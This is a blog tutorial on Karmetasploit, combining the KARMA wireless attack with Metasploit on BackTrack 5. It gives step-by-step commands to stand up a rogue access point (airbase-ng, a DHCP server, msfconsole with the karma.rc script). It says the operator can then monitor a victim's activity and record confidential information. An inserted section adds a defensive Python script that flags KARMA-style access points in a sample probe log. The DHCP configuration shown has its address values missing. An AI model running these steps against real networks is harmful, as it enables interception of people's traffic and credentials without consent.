Karmetasploit - Backtrack 5 Tutorial

Wireless communication has become a necessity in networking: radio signals are unseen, but they carry your information in the form of bits using different modulation techniques. Security is especially important for wireless networks because they are more exposed than wired ones. Having discussed wireless security and rogue access points before, in this article I will try to cover Karmetasploit.

Metasploit is now one of the best tools for penetration testing, and the word Karmetasploit is derived from two words: KARMA (KARMA Attacks Radioed Machines Automatically) and Metasploit.

So what is Karmetasploit? 

KARMA is a wireless client attack toolkit, and the integration of KARMA and Metasploit is called Karmetasploit. In 2004 Dino A. Dai Zovi and Shane A. Macaulay gave a presentation called "All your layer are belong to us", in which they described the insecurity of wireless access points and introduced the tool KARMA. This tool acts as a wireless access point and responds to all probe requests from wireless clients. Once a client has associated with the KARMA access point, every service it tries to access leads to a malicious application.
The passage above gives a basic introduction to KARMA; about Metasploit you can learn from here.
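As an added example (not code from the original article), here is a small defender-side check for the behaviour described above: a KARMA-style AP answers probe requests for any SSID, so one BSSID sending probe responses for many unrelated SSIDs is a strong indicator of a rogue AP. The log format, sample lines, function names and the threshold are all constructed for this example.

```python
from collections import defaultdict

# Constructed sample log (not real capture output). Format per line:
#   <frame_type> <source_mac> <ssid>
# For probe responses the source MAC is the AP's BSSID. The first
# BSSID answers four unrelated SSIDs, which is what a KARMA-style
# AP does; the second answers only the network it actually serves.
SAMPLE_LOG = """\
probe_req   de:ad:be:ef:00:01 HomeWiFi
probe_resp  00:11:22:33:44:55 HomeWiFi
probe_req   de:ad:be:ef:00:02 Coffee Shop
probe_resp  00:11:22:33:44:55 Coffee Shop
probe_resp  00:11:22:33:44:55 AirportFree
probe_resp  00:11:22:33:44:55 OfficeGuest
probe_resp  aa:bb:cc:dd:ee:ff OfficeGuest
probe_resp  aa:bb:cc:dd:ee:ff OfficeGuest
"""

def parse_log(text):
    """Return (frame_type, source_mac, ssid) tuples; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split(maxsplit=2)  # SSIDs may contain spaces
        if len(parts) == 3:
            records.append(tuple(parts))
    return records

def ssids_per_responder(records):
    """Map each responding MAC (BSSID) to the distinct SSIDs it answered for."""
    seen = defaultdict(set)
    for frame_type, mac, ssid in records:
        if frame_type == "probe_resp":
            seen[mac].add(ssid)
    return seen

def find_karma_candidates(records, threshold=3):
    """BSSIDs that sent probe responses for at least `threshold` distinct SSIDs.

    A legitimate AP only answers for the SSID(s) it serves, so a high count
    is the signature of an AP that says "yes" to every probe request.
    """
    responders = ssids_per_responder(records)
    return sorted(mac for mac, ssids in responders.items() if len(ssids) >= threshold)

if __name__ == "__main__":
    for mac in find_karma_candidates(parse_log(SAMPLE_LOG)):
        print("possible KARMA-style AP:", mac)
```

In practice the input would come from a wireless IDS or a monitor-mode capture converted to this simple form; the threshold should be tuned so that multi-SSID enterprise APs are not flagged.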
Karmetasploit Tutorial

If you are not using BackTrack 5 then you have to install some dependencies, such as Aircrack-ng:
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install 
# airmon-ng start [wifi-interface]
On BackTrack (for example BackTrack 5) follow this procedure instead:
root@bt:/pentest/exploits/framework3# wget http://www.offensive-security.com/downloads/karma.rc
Now we need to configure a DHCP server so that clients connecting to the fake AP are given network settings (the address values are missing from the listing below; use the addresses of your own test network):

root@bt:/pentest/exploits/framework3# cat /etc/dhcp3/dhcpd.conf
option domain-name-servers;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

log-facility local7;

subnet netmask {
  option routers;
  option domain-name-servers;
}

The Karma script also needs the following Ruby gems:
root@bt:~# gem install activerecord sqlite3-ruby

By now we are almost done; it is time to restart the wireless interface and start listening.

root@bt:~# airmon-ng
root@bt:~# airmon-ng stop ath0
root@bt:~# airmon-ng start wifi0
root@bt:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1

What do these commands do? They create a new interface, the rogue interface or fake AP. Now we have to assign it an IP address and start the DHCP server on it so that the interface works properly.

root@bt:~# ifconfig at0 up netmask
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root@bt:~# ps aux | grep dhcpd

Karmetasploit Attack Vector 
After configuration you are ready to run Karmetasploit and start an attack:
root@bt:~# cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# msfconsole -r karma.rc
This command starts Metasploit, and the Karma script then starts acting as a fake AP and gives you a prompt like this:

msf auxiliary(http) >

When a victim starts using this AP you are free to monitor all of their activity, and you can record confidential information.

msf auxiliary(http) >
[*] DNS XID 87 (IN::A www.google.com)

This is a slightly advanced tutorial; if you don't understand it, that means you have to understand rogue access points first.

Ehacking Staff